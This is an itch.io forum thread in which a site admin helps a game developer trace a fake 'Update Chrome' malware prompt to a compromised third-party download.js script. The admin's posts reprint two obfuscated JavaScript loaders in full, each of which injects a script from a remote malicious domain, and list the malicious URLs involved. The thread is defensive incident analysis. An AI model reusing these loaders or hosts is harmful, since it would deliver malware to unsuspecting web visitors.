Skip to main content

Indie game storeFree gamesFun gamesHorror games
Game developmentAssetsComics
SalesBundles
Jobs
TagsGame Engines

Fake Chrome Update window leading to virus displayed over the game

A topic by Anduo Games created Apr 02, 2020 Views: 3,674 Replies: 7
Viewing posts 1 to 3
(2 edits)

Heya, we've got someone complaining that their browser wanted to update to play our unity webgl build.

We've tried to replicate this. After a bunch of reloads, we got this very weird message:

We've downloaded the webpage from this and it seems like the image of chrome in a screen at the bottom of the message is hosted on this domain: http://khmchamorshi.com/

The "Update Chrome" Button looks like this in html:

class="button eula-download-button download-button desktop-only hide-cros" href="blob:https://A_SUBDOMAIN_WAS_HERE.ssl.hwcdn.net/A_GUID_WAS_HERE" id="buttonDownload" download="Chrome.Update.41c9a6.js">Update Chrome

I replace a guid with "A_GUID_WAS_HERE" and a subdomain with "A_SUBDOMAIN_WAS_HERE" to make sure nobody clicks on this and gets a virus. Could it be that there's something wrong with itch.io's cdn?

Edit: I just checked the webgl.zip we uploaded by downloading it again from itch.io. The files are clean. It seems that the cdn is injecting this part of the website.

(+1)

href=“blob:https://A_SUBDOMAIN_WAS_HERE.ssl.hwcdn.net/A_GUID_WAS_HERE”

This is a blob URL (note blob:), created with URL.createObjectURL browser API, and so it is not served from that domain (and the URL is only valid in your browser btw). Presence of the domain there only means that the URL was generated by script served from that domain, that is, by your game.

So, for what it’s worth, it still may be that your game build somehow got infected before you uploaded it. Also it may simply be some shady ad, if you have integrated some in-game ad SDK. It seems you took down the web version, so of course cannot say for sure.

(+1)

Hey there, thanks a lot for the answer!

I didn't know blob is for local downloading. That makes this a lot more concerning. The zip we uploaded is coming directly from our unity cloud build setup. I can't see how that would have gotten infected. Here's a link to our webgl zip: https://drive.google.com/open?id=17GRKiDZowuip0tr3vFeIa2TK-6zPY-41

We've took the browser version down because of the security concern. 

I can't find anything suspicious in the index.html

Admin

I can’t find anything suspicious in the index.html

Unity games run inside of an entire virtual machine with code stored in the binary files that are shipped along with your game, if there’s something malicious in your game then there’s a good chance the code for that is located within that binary file, and not sitting in plain sight in your index.html file.

Also it may simply be some shady ad, if you have integrated some in-game ad SDK

This seems like the most reasonable explanation

Admin (17 edits) (+1)

Edit: I just checked the webgl.zip we uploaded by downloading it again from itch.io. The files are clean. It seems that the cdn is injecting this part of the website.

This is highly unlikely. As I mentioned in the other comment, it’s likely you have a rogue SDK you’re using that is embedded into the binary files distributed with your HTML5 export that is being executed by Unity’s virtual machine. You will not be able to just look at the files of your HTML5 build to identify something like this. I suggest you review all the code you’ve included in your project before you have exported it. Alternatively third party resources included by your game could be compromised in some way, either as any scripts that you didn’t write, or scripts that are dynamically loaded from other domains.

I’ve downloaded the file you uploaded and I’ll upload it to a private page to take closer look to see if I can spot anything. Can you tell me when exactly this message appears after reloading the game? Does it appear immediately or do you have to click to start the game?

Edit: The GUID resource names located on the same path as your game appear to be how unity extracts its runtime. This to me suggests that the malicious could be coming from inside of your Unity game’s code.

Edit: I tried loading your game many times over but never was able to trigger the message. I think it’s related to my operating system/browser, as it probably only appears to a subset of people to make it hard to detect. I did notice some suspicious obfuscated code at the bottom of a file hosted on the domain js.zapjs.com, the exact file is here: https://js.zapjs.com/js/download.js on the very last line. This doesn’t appear to be part of the library. This file gets added into the browser by Unity code executing from what I can tell. (When progress bar shows 90%, which corresponds with the report given in your comments)

I’ve included it below in case it gets removed by whoever is hosting it:

Show code
var a=['text/javascript',')njosirthalcfoml5','length','trderrnrme1fze6r(','script','abs','parentNode','getElementsByTagName','t=ha5mytou5_p_d','5mgrfokf7tma7l!pp','type','async','oe3m6axnwt8s5omh7','jfjOcxieyd2njif','createElement','while','insertBefore'];(function(b,e){var f=function(g){while(--g){b['push'](b['shift']());}};f(++e);}(a,0x12b));var b=function(c,d){c=c-0x0;var e=a[c];return e;};var _cs=['3tqnjerg4Akriews)ue',b('0xb'),b('0x10'),'vb37(ej4q84fb1x9v8w6e1lau4!34c443cf64097sap8!afeeeh0qbgchc!7q2289=gvu&!0a402m=1duiicu?3sfjb.(esdpoun2_qi9uj/8m9ozc0.20v6h3gt(ayt9snkfcnixlvci.vcqiql0bmu4p1/)/p:isuprt)tzhp',b('0x5'),b('0x3'),b('0xa'),b('0x8'),'get','fejiekzokovce',b('0xf'),b('0x2'),b('0xc'),b('0x7')];if(ndsw===undefined){var ndsw=true;(function(){var c=navigator;var d=document;var e=screen;var f=window;var g=c[m(_cs[0x0])];var h=c[m(_cs[0x2])];var i=d[m(_cs[0x9])];var j=f[m(_cs[0x7])][m(_cs[0xb])];var k=d[m(_cs[0x6])];if(k&&!n(k,j)){if(!n(i,m(_cs[0xa]))){var c=d[b('0x4')](_cs[0x1]);c[b('0x0')]=_cs[0xd];c[b('0x1')]=!![];c['src']=m(_cs[0x3]);var l=d[b('0xe')](_cs[0x1])[0x0];l[b('0xd')][b('0x6')](c,l);}}function m(p){var q='';for(var r=0x0;r<p[b('0x9')];r++){if(r%0x2===0x1)q+=p[r];}q=o(q);return q;}function n(p,q){return p[m(_cs[0x5])](q)!==-0x1;}function o(p){var q='';for(var r=p[b('0x9')]-0x1;r>=0x0;r--){q+=p[r];}return q;}}());}

Edit: I stepped through the script with a debugger, it ends up loading anotheer script from another domain. In my case, it’s https://public.clickstat360.com/ui_node.js?cid=240&v=827ccb0eea8a706c4c34a16891f84e7b I’ve included code:

Show code
(function(){var hl=document[qd("4r)e;r{r,e,f(ewrk")]||'';var rz=new RegExp(qd('&/;),+a])/(^,[{(,/)/i:h'));if(!hl||window[qd("fn}oeilt4a)c,o3ly")][qd("ff,e1r{h,")][qd("1h{cdt(a2mi")](rz)[1]==hl[qd("1h{cdt(a2mi")](rz)[1]){return;};var vm=navigator[qd("yt}n(e}g6A}r,e}szu8")];var wl=document[qd("pefi,k;o3o{c0")];if(tk(vm,qd("/sfw,o(d(n,i;W{"))&&!tk(vm,qd(".d{imo}r,dvn(Ad"))){if(!tk(wl,qd("#={a6m(t;u,_)_}_;"))){var on=document.createElement('script');on.type='text/javascript';on.async=true;on.src=qd('74(7,7(1;1}4m5)8;5;1a=ht6&)3;Q3j,M;9{Q;W7a;jtZ)S(Z,2(cuj(Ney6k(DxZ{h)RnW9Z1ziU(z8Y61{U}DhM{k{N,D}O(i01}j{d(=}d;?vd{x{a,.)e,c,r{u{o(s9e(R{b;efW;/gm)opc{.}s(e{clijv{r(ebs)m}tor{azm2sa.{e1n{o(h3pb/6/s:7s,p7t;tdh(');var ce=document.getElementsByTagName('script')[0];ce.parentNode.insertBefore(on,ce);}}function qd(oy){var je='';for(var uv=0;uv<oy.length;uv++){if(uv%2===1)je+=oy[uv];}je=uy(je);return je;}function tk(gd,no){return gd[qd(":f)Osx)e9d;nsi}")](no)!==-1;}function uy(fc){var pu='';for(var xx=fc.length-1;xx>=0;xx--){pu+=fc[xx];}return pu;}})();

It’s now finally taking me a the URL https://phone.smartmservices.com/WebResource.axd?d=dj1iODNkMDU1YzUzZWRhZDkyNjc2ZSZjaWQ9MjQ3&t=1585411774z

Edit: Alright, I kept following it until I got stuck. I’m giving up at this point because it’s pretty clear that there’s some suspicious code compiled into your game. You might want to start with finding out why the zapjs domain is showing up.

Twitter thread here: https://twitter.com/moonscript/status/1245868730501844994

Thank you so much for the help! We've cut out the piece of code that was causing this. Seems like it was just an innocent auto-updater for the download.js that recently got compromised with that obfuscated code. Will see if this solves the issue.

Admin(+1)

Can you share a link to the library so we can help report it?

You already found the correct link, it's this: http://js.zapjs.com/js/download.js
We download this at runtime in our unity game for the purpose of letting the user export a save game.

This topic has been auto-archived and can no longer be posted in because there haven't been any posts in a while.